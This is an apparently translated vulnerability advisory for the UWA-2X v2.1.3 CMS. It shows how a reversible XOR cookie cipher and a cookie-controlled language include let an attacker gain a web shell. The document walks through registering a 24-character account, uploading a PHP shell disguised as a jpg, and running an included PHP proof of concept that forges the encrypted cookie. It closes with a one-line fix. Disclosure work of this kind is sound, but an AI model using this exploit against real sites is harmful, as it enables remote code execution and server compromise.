UWA-2X (v2.1.3) Foreground unrestricted getshell caused by a function defect

UWA-2X (v2.1.3) Foreground unrestricted getshell caused by a function defect

 

Vulnerability in cookie encryption function

public static function encrypt($txt, $key = '') {$encrypt_key = md5(mt_rand(0, 32000));$ctr = 0;$tmp = '';for($i = 0; $i < strlen($txt); $i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);}return base64_encode(self::_crypt($tmp, $key));}public static function decrypt($txt, $key = '') {$txt = self::_crypt(base64_decode($txt), $key);$tmp = '';for($i = 0; $i < strlen($txt); $i++) {$md5 = $txt[$i];$tmp .= $txt[++$i] ^ $md5;}return $tmp;}private static function _crypt($txt, $encrypt_key) {$encrypt_key = md5($encrypt_key);$ctr = 0;$tmp = '';for($i = 0; $i < strlen($txt); $i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];}return $tmp;}

Why is it the same as dede...


We can control the cookie because it can be reversed.



The next step is getshell.

See
 

/core/lib/core/App.class.phpprivate static function load_lang() {$langSet = C('LANG.NAME');/* detect language */if(C('LANG.DETECT')) {$_t_l = ARequest::get(C('VAR.LANG'));if(!empty($_t_l)) {$langSet = strtolower(ARequest::get(C('VAR.LANG')));ACookie::set('lang', $langSet);}elseif(ACookie::get('lang')) {$langSet = ACookie::get('lang');}elseif(isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {preg_match('/^([a-z\-]+)/i', $_SERVER['HTTP_ACCEPT_LANGUAGE'], $matches);$langSet = strtolower($matches[1]);ACookie::set('lang', $langSet);}}define('LANG_SET', strtolower($langSet));/* load framework language */if(is_file(PFA_PATH . '/lang/' . LANG_SET . '.lang.php')) {L(include PFA_PATH . '/lang/' . LANG_SET . '.lang.php');}elseif(is_file(PFA_PATH . '/lang/' . C('LANG.NAME') . '.lang.php')) {L(include PFA_PATH . '/lang/' . C('LANG.NAME') . '.lang.php');}ACookie::set('lang', $langSet);

 

After receiving the cookie of lang, it is included. We can upload a shell in jpg format and then intercept the content. Because the data is encrypted and decrypted, we ignore the impact of gpc ~



-------------------

Exploitation process,

First, register an account with a length of 24 In order to perfectly control the cookie value,

Upload a shell in jpg format

Remember the address and check the value of cookie uwa_m_userid. The corresponding plaintext format is

S: Length: "account name ";

Will get the value

Enter the following poc

<?phpfunction cracked($Expressly,$Ciphertext,$str,$way){$Ciphertext = base64_decode($Ciphertext);if ($way=="descrypt"){$text2="";$str=base64_decode($str);}else{$text2="a";}$j=0;$s=0;for($i=0;$i<strlen($str);$i++,$s++){if($j==32){$j=0;$s=0;}$tmp=$Ciphertext[$j]^$Ciphertext[$j+1];$tmp=$tmp^$Expressly[$s];$tmp=$tmp^$str[$i];if ($way=="descrypt"){$text1=$tmp^$str[++$i];}else{$text1=$tmp^$text2;}$xxoo =$xxoo.$text2.$text1;$j=$j+2;}if ($way=="descrypt"){echo $xxoo;}else{echo base64_encode($xxoo);}}$a=$_GET['a'];$a=serialize($a);cracked("s:24:\"a11111111111111111111111\";","U3pRPFA/VjMHaVMsW2BWNVFlVTJWZQU1CDxZMVNgXWdUP1YwUDwHZ1QxA28OZVQ3DTlWMVVmUmJVYQxkV3ddbQ==",$a,"encrypt"); ?>

Get the final playload
 

Poc must be executed when gpc is disabled. It doesn't matter if the target station cannot open gpc. Because the data is encrypted and decrypted, The Impact of gpc is ignored ~

Modify the cookie value. The php script is successfully executed.
 

 

  Solution:

Change the algorithm. Or filter the decrypted values.